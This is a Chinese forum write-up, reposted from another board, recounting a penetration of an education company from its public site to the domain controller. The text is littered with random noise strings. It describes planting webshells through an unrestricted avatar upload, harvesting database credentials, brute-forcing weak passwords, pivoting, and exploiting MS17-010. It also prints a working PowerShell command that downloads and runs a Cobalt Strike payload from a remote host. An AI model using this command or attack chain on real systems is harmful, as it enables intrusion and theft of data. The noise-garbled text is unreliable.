|
$ }: }5 ?) d& Z
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路" L0 _/ N! q, Y) O- H" k
$ n! o# a) {. ? v; |" T4 a# m( E
4 s. Y2 S4 l% c# c
+ }$ l; v7 D5 w5 R7 ^7 `% P9 X
% b' p5 c1 Q9 M/ h* I+ Q9 ^3 Z6 C0 y+ ?- \ p& b7 ]8 E( Y
正文3 Q# {3 `5 {, B! P
( x, y8 i1 p: E0 i* t
7 }, K6 L/ g. g% ]% ~ ( T; X3 k' f8 L
3 T) H8 \ n9 {/ Z" K) o* {4 W- z4 a5 F, h) P& A
目标:www.xxxx.com(一家教育机构)
4 U: ^" G7 F$ e c打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
" V9 c: A z6 t' y. M- e$ i
! L+ ?. S @& t Q
' S, e- z3 L5 W 
7 S `- G4 r- A. x- a1 r: Z$ g
3 D2 i$ f% E# W* C V" a0 P. E0 P( F
进行了简单的信息搜集
, k. f' @9 T7 i; v4 V2 T0 ^
; D- `6 m3 j; {. K9 s7 R) u& c" {
1 C/ w+ ]4 H2 A0 m 9 j2 m% x1 A2 g9 ]1 q4 X
l$ ^& j3 G" O Y& e" T E5 W6 W# I 子域名搜集
' s# |3 }4 n8 @ ?! p9 N) W( b ! d2 G+ z3 s3 z# g
% d7 s7 w5 C, _; l( ^  ) y5 v p0 Z& X+ Y9 Q4 @0 F
* Q) V7 n# k( F+ W$ E. r% [
; h: R$ L+ u) F- u; c7 M9 F: ` fofa找资产
2 R: L1 i% ]; L
% t, [4 ~5 N1 d0 k7 k, ?
, w$ _0 a% u4 O+ w! h# |5 | 1 q' {6 W3 g6 {2 D8 B+ @ ?
' X$ ^% D& H, n7 r
 : @: u: d4 h' q/ i
[: E* Y2 \) [9 x# F& e# M3 e! \0 L
4 w( A- a* h+ u4 C$ ?/ T; @
一共七个资产。去重之后只有两个。
' k9 J1 B. i* T+ Z3 L0 S
: p% J2 I. @! w6 F7 I( C) \9 r- U! o/ W4 j3 y' a7 T( D) U8 u% }
) P0 I- n0 b N6 e5 [( b) v" o9 x3 j
* h+ t8 [7 T U4 C 目录探测
: s. O, N; A& G0 m2 P o- h0 B6 y
# d, ~: g% j- a' h( V9 P, ?; e3 w) M5 E) e- D& R6 b8 m. T
 y. h9 ?( o! `6 O% ]
8 E9 p, _& i- P, K, M0 k( Q' W6 T
% N8 q- T9 W! y8 m) l) T: C, z( {
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
$ c# f2 Z% X, E" ^! E
* h. a0 @9 x+ o8 k. m* X
0 b' p7 E2 j6 s5 v 8 A- I; |* W! X
6 R: N( q" F0 y9 g3 g( m7 i o) v 我又尝试了通过修改返回包来绕过登录界面
4 n" | X M( g" W2 Q* F
$ x `, E" }. a2 }
5 k1 k7 ?2 }9 l. }) |0 S( j6 n i 
) n; U0 A8 F; w 4 R0 g* i$ I; S- i* d
/ B. L* n J! h* E
还是不行,尝试注入无果
8 D8 x, M: c% Q7 B+ v; H( X6 c
- |+ c* _! _, d. u/ ?. @
* R5 u6 O1 ?% k* S6 {  1 d4 u; _- r) d+ w
, D0 P ~! e8 Y9 z2 H j
, u/ r4 z8 r7 ~' Q! G( b
不过我目录探测出了一处Spring信息泄露
" V9 v3 E% B& l9 ]( {" K. K
& k h0 u1 i w4 n: g7 {
' W. b1 p( Z* F3 j" N$ g* e3 N0 Z* {: H ( J6 {$ l0 j* C4 m. o0 t
' I( U9 d1 @, O) N' ^% Y$ Q. \  4 ]- W* U- r. ]( I$ U$ s5 g. v. [
# S2 C. V; C4 X. ?9 |" }7 f: P: A+ G5 ?5 r% A4 V
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
- M+ a- d2 K ~& T * D; R% N0 O" Z2 n
( b U- m5 L2 }) r8 `& f
2 K( @- n/ i) b! k2 n & T; R2 q/ U( _( o5 ?
. \' u% w; |7 j, s
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。$ \! w: ~4 F: w
2 c, S/ M' {2 K5 P. P% h' s! m
2 P* [% E- O6 B; M  " ]+ ]. s$ \8 ~# S
0 R: C) i# w- t% D7 [ g
4 G, }2 G7 P% K/ F, W
获取有些师傅到这一步就手机抓包电脑测了。! E0 ^/ S- r6 Z$ T: q0 |* a4 V
3 i6 \) Z8 g- \% L& J; p
( ~4 d' }) Y1 h5 {% W
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。! J6 m' U1 c7 R! h7 j. C
1 g# b$ \9 m* e: Z5 F. \1 v) J
& U. J4 B: B, ]/ k. u8 f F% k 其中在一个公众号发现了小程序,可以进行注册。) ^" h$ e1 Q( V" L+ n. D$ {# e
$ Y2 z+ z) y1 z8 _
6 h7 a; c' B. u K" n 看到了头像上传,尝试上传获取WebShell
& K7 o. {4 V5 n+ Q8 t$ C
! O$ U4 E8 G& M o7 g4 Z) E+ r
$ m# p4 j3 N$ ~+ D! q" a, c 
# W/ Z7 j4 R* i" d" u 8 s7 C# |4 u4 ~ o+ I* D/ E
9 C3 ?- Z" |6 [6 R9 \ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
0 A, J; _0 n0 e$ u, E 8 V9 U- @% ]$ ?; R N
3 f' j6 J- g6 B8 {, p/ z  7 b% f" N& G) p/ Z9 M
) D' O& D" ~. W7 _0 f5 {0 r) l& V
然后上了大马! y7 }4 f' ]6 _3 H4 r7 k2 Q9 R- Y
' c( }. }; ~6 c: b
. g* {9 |' R& ^6 a8 l' [* w% P
 ; _' P4 T# H* l: ]4 A0 |
# T6 b$ W% K5 H3 i' s
; F0 s- F. W9 Q/ u% ^ 
7 f( R9 l- P; i / B8 {7 ~, h( S7 l& r- t2 L# m
e! m" x) ?( `! p" B
通过翻找文件发现数据库账号密码
; n. a- T. A$ e, J
# W: c8 V/ D. Q2 B
3 l. X- ?3 Q( W: s* c! v! k  , R; q* D/ Q2 L! x5 U' m/ j( n! |0 y
: f% C' }- k6 ^3 h( Y2 K8 B5 ?, S" D% ~3 p/ {
--内网渗透
: i2 K' l# x$ U* X0 m1 a) B% c0 z
5 E' O. T: l. \- r( I5 p& U& Y* O) K0 q& L* Y% w# A- w' A5 B6 Y
直接通过powershell执行 cs上线
4 b3 c+ b4 Y& G3 W
, O( J7 j: F* K% l2 _
7 j. K2 [/ H' a. A( r6 ~ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))". R* o) N% f. G& |; P. Y
- E; y7 x5 B3 _; Q6 e$ z+ y
; b8 L$ I1 B1 v% S1 _8 y  7 ?4 X/ ?% ^ A& D* k
" p! \" @7 x1 C' N9 B! `
( U. i! e5 X$ R, {7 o 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破7 z. |6 T' E, M& s; K
, T9 t" t$ Z1 y" M% Y8 c
) z7 f4 c, G+ e' k! D0 ` 
^: `- I6 h: q1 c- M7 H/ W
. V6 b4 J# y4 L8 s9 A" T) p6 d0 S3 {
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
; `; e9 T9 i1 ?; ]
9 ~: e" d" s: G
) Z9 h' A* [- s# y. o, o' n9 l1 W6 f- ^' e8 [/ x6 m% l/ _
8 v% y1 B6 E+ w0 K" [+ P- @) F* S# Y+ p
 ' ?3 S, G$ `( i# O& B6 j
( J* t& Q( `7 F3 p: z
9 h4 y+ w! [( F3 q* x& c7 f5 n 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
' F- k! n: v7 N, L% c2 x& {
/ f; n3 _2 i3 D9 D/ q7 n( K
" u1 ]5 |' Z! T 5 U5 Z: X" U1 ~$ [) m
s# S# X+ `. [" ?' \7 g
8 b8 [* v7 k* T4 E$ H4 O
) N8 K: l7 v- m* ?8 m3 D; B, _& W# a9 V b3 V0 c
8 [& L8 `5 C- ?% K
% ?4 n9 \' c" G! m; L' ~) _. Q' ]) Z2 t7 D$ y
' P+ ]" ^( _% d8 R0 k' I& ~
2 D. w- T' c- P; z( R: r( k; q
6 v& }; O( |" y6 f& ^: b ?9 |5 u; E7 p$ O
) D0 z- n0 e* J; c 小结 l$ w9 ], A2 c0 O! @1 b
+ N: w3 [: Q6 i: |9 y% Z) J4 D( l
4 ~0 O" V& P- S# t8 M. M. b6 d 8 J8 \$ e! n& Q( ?6 B5 m8 r+ X! t) J5 r
8 I5 F5 N; Y- Y3 x0 Q
) b% { ]3 K% g 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
- a8 ]$ Z+ K6 G ?; E" a
1 D {# z* O; a. i2 t8 ]* J
Z2 j1 b4 b, O2 ^$ f
* f5 c- E3 A% [# x, w) U* U 7 p M! a6 g- J
( ^5 I; g+ t6 I8 E. k# b -
( u, P: j, _5 _& g
: J- M S/ G$ @4 E7 `- |: X& @( v
: k- U; S' z. W1 O8 [ - ( }: U5 s) R' e1 y: V; Y; R |
0 d2 a6 E0 p* }+ K) T
' T( T+ d1 I7 u9 [8 g8 n
8 \) P k/ J8 ?! n- j
Z; S$ G' F5 q4 ?! U( Y+ X: ~
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html7 C0 @- ]- f6 N5 K1 p7 Z1 L
) @* B w+ J. c4 w* F7 n5 ^
' Y7 w1 c1 t! Z
9 n1 Q; D. C* X( h& _; T0 A! j | 
发表于 2024-3-1 19:41:32
收藏
支持
反对